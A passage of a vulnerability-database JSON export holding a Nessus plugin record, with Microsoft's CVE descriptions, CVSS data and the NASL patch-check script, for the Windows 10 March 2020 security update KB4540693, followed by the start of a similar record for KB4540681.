attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in Windows Error Reporting (WER) when WER handles and executes files. The vulnerability could allow elevation of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability could gain greater access to sensitive information and system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise the users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document, or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory. An attacker who successfully exploited this vulnerability could take control of the affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0881, CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the Windows GDI component improperly discloses the contents of its memory. An attacker who successfully exploited the vulnerability could obtain information to further compromise a users system. There are multiple ways an attacker could exploit the vulnerability, such as by convincing a user to open a specially crafted document or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this vulnerability could obtain information to further compromise the users system. An attacker who had already gained execution on the victim system could exploit this vulnerability by running a specially crafted application. The update addresses the vulnerability by correcting how Media Foundation handles objects in memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the Windows Update Orchestrator Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Update Orchestrator Service handles file operations. (CVE-2020-0867, CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network List Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC). An attacker who successfully exploited this vulnerability could run arbitrary code in the security context of the local system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the Windows Universal Plug and Play (UPnP) service improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists when the Windows Network Driver Interface Specification (NDIS) improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when DirectX improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - A denial of service vulnerability exists when the Windows Tile Object Service improperly handles hard links. An attacker who successfully exploited the vulnerability could cause a target system to stop responding. (CVE-2020-0786)\n\n - A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when MSI packages process symbolic links. An attacker who successfully exploited this vulnerability could bypass access restrictions to add or remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the Windows Background Intelligent Transfer Service (BITS) improperly handles symbolic links. An attacker who successfully exploited this vulnerability could overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the Diagnostics Hub Standard Collector Service improperly handles file operations. An attacker who successfully exploited this vulnerability could gain elevated privileges. An attacker with unprivileged access to a vulnerable system could exploit this vulnerability. The security update addresses the vulnerability by ensuring the Diagnostics Hub Standard Collector Service properly handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when Windows Error Reporting improperly handles file operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in Windows when the Windows Imaging Component fails to properly handle objects in memory. An attacker who succesfully exploited this vulnerability could obtain information to further compromise the user's system.\n There are multiple ways an attacker could exploit this vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the Windows Language Pack Installer improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Language Pack Installer handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the Windows ActiveX Installer Service improperly handles memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way that the ChakraCore scripting engine handles objects in memory. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. (CVE-2020-08323, CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829, CVE-2020-0831)", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-03-10T00:00:00", "type": "nessus", "title": "KB4540693: Windows 10 March 2020 Security Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0645", "CVE-2020-0684", "CVE-2020-0690", "CVE-2020-0768", "CVE-2020-0769", "CVE-2020-0770", "CVE-2020-0771", "CVE-2020-0772", "CVE-2020-0773", "CVE-2020-0774", "CVE-2020-0775", "CVE-2020-0777", "CVE-2020-0778", "CVE-2020-0779", "CVE-2020-0780", "CVE-2020-0781", "CVE-2020-0783", "CVE-2020-0785", "CVE-2020-0786", "CVE-2020-0787", "CVE-2020-0788", "CVE-2020-0791", "CVE-2020-0793", "CVE-2020-0797", "CVE-2020-0799", "CVE-2020-0800", "CVE-2020-0801", "CVE-2020-0802", "CVE-2020-0803", "CVE-2020-0804", "CVE-2020-0806", "CVE-2020-0809", "CVE-2020-0810", "CVE-2020-0814", "CVE-2020-0819", "CVE-2020-0820", "CVE-2020-0822", "CVE-2020-0823", "CVE-2020-0824", "CVE-2020-0826", "CVE-2020-0827", "CVE-2020-0828", "CVE-2020-0829", "CVE-2020-0830", "CVE-2020-0831", "CVE-2020-0832", "CVE-2020-08323", "CVE-2020-0833", "CVE-2020-0834", "CVE-2020-0840", "CVE-2020-0841", "CVE-2020-0842", "CVE-2020-0843", "CVE-2020-0844", "CVE-2020-0845", "CVE-2020-0847", "CVE-2020-0849", "CVE-2020-0853", "CVE-2020-0857", "CVE-2020-0858", "CVE-2020-0859", "CVE-2020-0860", "CVE-2020-0861", "CVE-2020-0864", "CVE-2020-0865", "CVE-2020-0866", "CVE-2020-0867", "CVE-2020-0868", "CVE-2020-0869", "CVE-2020-0871", "CVE-2020-0874", "CVE-2020-0877", "CVE-2020-0879", "CVE-2020-0880", "CVE-2020-0881", "CVE-2020-0882", "CVE-2020-0883", "CVE-2020-0885", "CVE-2020-0887", "CVE-2020-0896", "CVE-2020-0897"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:microsoft:edge"], "id": "SMB_NT_MS20_MAR_4540693.NASL", "href": "https://www.tenable.com/plugins/nessus/134373", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(134373);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2020-0645\",\n \"CVE-2020-0684\",\n \"CVE-2020-0690\",\n \"CVE-2020-0768\",\n \"CVE-2020-0769\",\n \"CVE-2020-0770\",\n \"CVE-2020-0771\",\n \"CVE-2020-0772\",\n \"CVE-2020-0773\",\n \"CVE-2020-0774\",\n \"CVE-2020-0775\",\n \"CVE-2020-0777\",\n \"CVE-2020-0778\",\n \"CVE-2020-0779\",\n \"CVE-2020-0780\",\n \"CVE-2020-0781\",\n \"CVE-2020-0783\",\n \"CVE-2020-0785\",\n \"CVE-2020-0786\",\n \"CVE-2020-0787\",\n \"CVE-2020-0788\",\n \"CVE-2020-0791\",\n \"CVE-2020-0793\",\n \"CVE-2020-0797\",\n \"CVE-2020-0799\",\n \"CVE-2020-0800\",\n \"CVE-2020-0801\",\n \"CVE-2020-0802\",\n \"CVE-2020-0803\",\n \"CVE-2020-0804\",\n \"CVE-2020-0806\",\n \"CVE-2020-0809\",\n \"CVE-2020-0810\",\n \"CVE-2020-0814\",\n \"CVE-2020-0819\",\n \"CVE-2020-0820\",\n \"CVE-2020-0822\",\n \"CVE-2020-0823\",\n \"CVE-2020-0824\",\n \"CVE-2020-0826\",\n \"CVE-2020-0827\",\n \"CVE-2020-0828\",\n \"CVE-2020-0829\",\n \"CVE-2020-0830\",\n \"CVE-2020-0831\",\n \"CVE-2020-0832\",\n \"CVE-2020-0833\",\n \"CVE-2020-0834\",\n \"CVE-2020-0840\",\n \"CVE-2020-0841\",\n \"CVE-2020-0842\",\n \"CVE-2020-0843\",\n \"CVE-2020-0844\",\n \"CVE-2020-0845\",\n \"CVE-2020-0847\",\n \"CVE-2020-0849\",\n \"CVE-2020-0853\",\n \"CVE-2020-0857\",\n \"CVE-2020-0858\",\n \"CVE-2020-0859\",\n \"CVE-2020-0860\",\n \"CVE-2020-0861\",\n \"CVE-2020-0864\",\n \"CVE-2020-0865\",\n \"CVE-2020-0866\",\n \"CVE-2020-0867\",\n \"CVE-2020-0868\",\n \"CVE-2020-0869\",\n \"CVE-2020-0871\",\n \"CVE-2020-0874\",\n \"CVE-2020-0877\",\n \"CVE-2020-0879\",\n \"CVE-2020-0880\",\n \"CVE-2020-0881\",\n \"CVE-2020-0882\",\n \"CVE-2020-0883\",\n \"CVE-2020-0885\",\n \"CVE-2020-0887\",\n \"CVE-2020-0896\",\n \"CVE-2020-0897\"\n );\n script_xref(name:\"MSKB\", value:\"4540693\");\n script_xref(name:\"MSFT\", value:\"MS20-4540693\");\n script_xref(name:\"IAVA\", value:\"2020-A-0214-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"KB4540693: Windows 10 March 2020 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4540693.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the\n Windows Device Setup Manager improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Device Setup Manager\n handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the\n Windows Work Folder Service improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Work Folder Service\n handles file operations. (CVE-2020-0777, CVE-2020-0797,\n CVE-2020-0800, CVE-2020-0864, CVE-2020-0865,\n CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in\n Windows Installer because of the way Windows Installer\n handles certain filesystem operations. (CVE-2020-0814,\n CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules\n Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow\n the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when\n Windows Network Connections Service fails to properly\n handle objects in memory. An attacker who successfully\n exploited the vulnerability could potentially disclose\n memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the\n "Public Account Pictures" folder improperly\n handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS\n Server improperly handles malformed request headers. An\n attacker who successfully exploited the vulnerability\n could cause a vulnerable server to improperly process\n HTTP headers and tamper with the responses returned to\n clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0788, CVE-2020-0877,\n CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network Connections Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0778, CVE-2020-0802,\n CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when the Windows kernel fails to\n properly handle parsing of certain symbolic links. An\n attacker who successfully exploited this vulnerability\n could potentially access privileged registry keys and\n thereby elevate permissions. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0799)\n\n - An elevation of privilege vulnerability exists when\n Connected User Experiences and Telemetry Service\n improperly handles file operations. An attacker who\n successfully exploited this vulnerability could run\n processes in an elevated context. An attacker could\n exploit this vulnerability by running a specially\n crafted application on the victim system. The security\n update addresses the vulnerability by correcting how the\n Connected User Experiences and Telemetry Service handles\n file operations. (CVE-2020-0844)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector or the Visual Studio\n Standard Collector allows file creation in arbitrary\n locations. (CVE-2020-0810)\n\n - A memory corruption vulnerability exists when Windows\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could install programs; view, change, or delete data; or\n create new accounts with full user rights. There are\n multiple ways an attacker could exploit the\n vulnerability, such as by convincing a user to open a\n specially crafted document, or by convincing a user to\n visit a malicious webpage. The security update addresses\n the vulnerability by correcting how Windows Media\n Foundation handles objects in memory. (CVE-2020-0801,\n CVE-2020-0809, CVE-2020-0869)\n\n - A remote code execution vulnerability exists in\n Microsoft Windows that could allow remote code execution\n if a .LNK file is processed. An attacker who\n successfully exploited this vulnerability could gain the\n same user rights as the local user. (CVE-2020-0684)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles hard links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0840, CVE-2020-0841, CVE-2020-0849,\n CVE-2020-0896)\n\n - An elevation of privilege vulnerability exists when the\n Windows User Profile Service (ProfSvc) improperly\n handles symlinks. An attacker who successfully exploited\n this vulnerability could delete files and folders in an\n elevated context. (CVE-2020-0785)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2020-0874, CVE-2020-0879)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0857)\n\n - An elevation of privilege vulnerability exists in\n Windows Error Reporting (WER) when WER handles and\n executes files. The vulnerability could allow elevation\n of privilege if an attacker can successfully exploit it.\n An attacker who successfully exploited the vulnerability\n could gain greater access to sensitive information and\n system functionality. (CVE-2020-0806)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise the users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document,\n or by convincing a user to visit an untrusted webpage.\n The security update addresses the vulnerability by\n correcting how the Windows GDI component handles objects\n in memory. (CVE-2020-0774, CVE-2020-0880, CVE-2020-0882)\n\n - A remote code execution vulnerability exists in the way\n that the Windows Graphics Device Interface (GDI) handles\n objects in the memory. An attacker who successfully\n exploited this vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2020-0881,\n CVE-2020-0883)\n\n - An information disclosure vulnerability exists when the\n Windows GDI component improperly discloses the contents\n of its memory. An attacker who successfully exploited\n the vulnerability could obtain information to further\n compromise a users system. There are multiple ways an\n attacker could exploit the vulnerability, such as by\n convincing a user to open a specially crafted document\n or by convincing a user to visit an untrusted webpage.\n The update addresses the vulnerability by correcting how\n the Windows GDI component handles objects in memory.\n (CVE-2020-0885)\n\n - An information disclosure vulnerability exists when\n Media Foundation improperly handles objects in memory.\n An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. An attacker who had already\n gained execution on the victim system could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how Media Foundation handles objects in\n memory. (CVE-2020-0820)\n\n - An elevation of privilege vulnerability exists when the\n Windows Update Orchestrator Service improperly handles\n file operations. An attacker who successfully exploited\n this vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Update Orchestrator\n Service handles file operations. (CVE-2020-0867,\n CVE-2020-0868)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Network List Service handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could execute code with\n elevated permissions. (CVE-2020-0780)\n\n - An elevation of privilege vulnerability exists when\n Windows improperly handles calls to Advanced Local\n Procedure Call (ALPC). An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n the security context of the local system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0834)\n\n - An elevation of privilege vulnerability exists when the\n Windows Universal Plug and Play (UPnP) service\n improperly handles objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code with elevated system privileges. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0781, CVE-2020-0783)\n\n - An information disclosure vulnerability exists when the\n Windows Network Driver Interface Specification (NDIS)\n improperly handles memory. (CVE-2020-0861)\n\n - An elevation of privilege vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could run arbitrary code in kernel mode. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0690)\n\n - A denial of service vulnerability exists when the\n Windows Tile Object Service improperly handles hard\n links. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2020-0786)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0832, CVE-2020-0833)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2020-0768, CVE-2020-0830)\n\n - An elevation of privilege vulnerability exists in the\n Windows Installer when MSI packages process symbolic\n links. An attacker who successfully exploited this\n vulnerability could bypass access restrictions to add or\n remove files. (CVE-2020-0779)\n\n - An elevation of privilege vulnerability exists when the\n Windows Background Intelligent Transfer Service (BITS)\n improperly handles symbolic links. An attacker who\n successfully exploited this vulnerability could\n overwrite a targeted file leading to an elevated status.\n (CVE-2020-0787)\n\n - A remote code execution vulnerability exists in the way\n that the VBScript engine handles objects in memory. The\n vulnerability could corrupt memory in such a way that an\n attacker could execute arbitrary code in the context of\n the current user. An attacker who successfully exploited\n the vulnerability could gain the same user rights as the\n current user. (CVE-2020-0847)\n\n - An elevation of privilege vulnerability exists when the\n Diagnostics Hub Standard Collector Service improperly\n handles file operations. An attacker who successfully\n exploited this vulnerability could gain elevated\n privileges. An attacker with unprivileged access to a\n vulnerable system could exploit this vulnerability. The\n security update addresses the vulnerability by ensuring\n the Diagnostics Hub Standard Collector Service properly\n handles file operations. (CVE-2020-0793)\n\n - An information disclosure vulnerability exists when\n Windows Error Reporting improperly handles file\n operations. (CVE-2020-0775)\n\n - An elevation of privilege vulnerability exists when the\n Windows CSC Service improperly handles memory.\n (CVE-2020-0769, CVE-2020-0771)\n\n - An information disclosure vulnerability exists in\n Windows when the Windows Imaging Component fails to\n properly handle objects in memory. An attacker who\n succesfully exploited this vulnerability could obtain\n information to further compromise the user's system.\n There are multiple ways an attacker could exploit this\n vulnerability: (CVE-2020-0853)\n\n - An elevation of privilege vulnerability exists when the\n Windows Language Pack Installer improperly handles file\n operations. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. An attacker could exploit this vulnerability by\n running a specially crafted application on the victim\n system. The update addresses the vulnerability by\n correcting the way the Windows Language Pack Installer\n handles file operations. (CVE-2020-0822)\n\n - An elevation of privilege vulnerability exists when the\n Windows ActiveX Installer Service improperly handles\n memory. (CVE-2020-0770, CVE-2020-0773, CVE-2020-0860)\n\n - An elevation of privilege vulnerability exists when\n Windows Error Reporting improperly handles memory.\n (CVE-2020-0772)\n\n - A remote code execution vulnerability exists in the way \n that the ChakraCore scripting engine handles objects in \n memory. The vulnerability could corrupt memory in such a \n way that an attacker could execute arbitrary code in the \n context of the current user. An attacker who successfully \n exploited the vulnerability could gain the same user \n rights as the current user. If the current user is logged \n on with administrative user rights, an attacker who \n successfully exploited the vulnerability could take \n control of an affected system. An attacker could then \n install programs; view, change, or delete data; or create \n new accounts with full user rights. (CVE-2020-08323,\n CVE-2020-0826, CVE-2020-0827, CVE-2020-0828, CVE-2020-0829,\n CVE-2020-0831)\");\n # https://support.microsoft.com/en-us/help/4540693/windows-10-update-kb4540693\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0759ed88\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4540693.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0690\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Background Intelligent Transfer Service Arbitrary File Move Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/03/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/03/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:edge\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-03\";\nkbs = make_list('4540693');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"03_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4540693])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T15:29:46", "description": "The remote Windows host is missing security update 4540681.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists when the Windows Device Setup Manager improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Device Setup Manager handles file operations. (CVE-2020-0819)\n\n - An elevation of privilege vulnerability exists when the Windows Work Folder Service improperly handles file operations. An attacker who successfully exploited this vulnerability could run processes in an elevated context. An attacker could exploit this vulnerability by running a specially crafted application on the victim system. The update addresses the vulnerability by correcting the way the Windows Work Folder Service handles file operations. (CVE-2020-0777, CVE-2020-0797, CVE-2020-0800, CVE-2020-0864, CVE-2020-0865, CVE-2020-0866, CVE-2020-0897)\n\n - A remote code execution vulnerability exists when Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. (CVE-2020-0824)\n\n - An elevation of privilege vulnerability exists in Windows Installer because of the way Windows Installer handles certain filesystem operations. (CVE-2020-0814, CVE-2020-0842, CVE-2020-0843)\n\n - An information vulnerability exists when Windows Modules Installer Service improperly discloses file information.\n Successful exploitation of the vulnerability could allow the attacker to read any file on the file system.\n (CVE-2020-0859)\n\n - An elevation of privilege vulnerability exists when the Windows Graphics Component improperly handles objects in memory. An attacker who successfully exploited this vulnerability could run processes in an elevated context. (CVE-2020-0791)\n\n - An information disclosure vulnerability exists when Windows Network Connections Service fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could potentially disclose memory contents of an elevated process. (CVE-2020-0871)\n\n - An elevation of privilege vulnerability exists when the "Public Account Pictures" folder improperly handles junctions. (CVE-2020-0858)\n\n - A tampering vulnerability exists when Microsoft IIS Server improperly handles malformed request headers. An attacker who successfully exploited the vulnerability could cause a vulnerable server to improperly process HTTP headers and tamper with the responses returned to clients. (CVE-2020-0645)\n\n - An elevation of privilege vulnerability exists in the way the Provisioning Runtime validates certain file operations. An attacker who successfully exploited the vulnerability could gain elevated privileges on a victim system. (CVE-2020-0808)\n\n - An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory. An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts with full user rights. (CVE-2020-0788, CVE-2020-0877, CVE-2020-0887)\n\n - An elevation of privilege vulnerability exists in the way that the Windows Network Connections Service handles objects in memory. An attacker who successfully exploited the vulnerability could execute code with elevated permissions. (CVE-2020-0778, CVE-2020-0802, CVE-2020-0803, CVE-2020-0804, CVE-2020-0845)\n\n - An elevation of privilege vulnerability exists in the Windows Installer when the Windows Installer fails to properly sanitize input leading to an insecure library loading behavior. A locally authenticated attacker could run arbitrary code with elevated system privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. The security update addresses the vulnerability by correcting the input sanitization error to preclude unintended elevation. 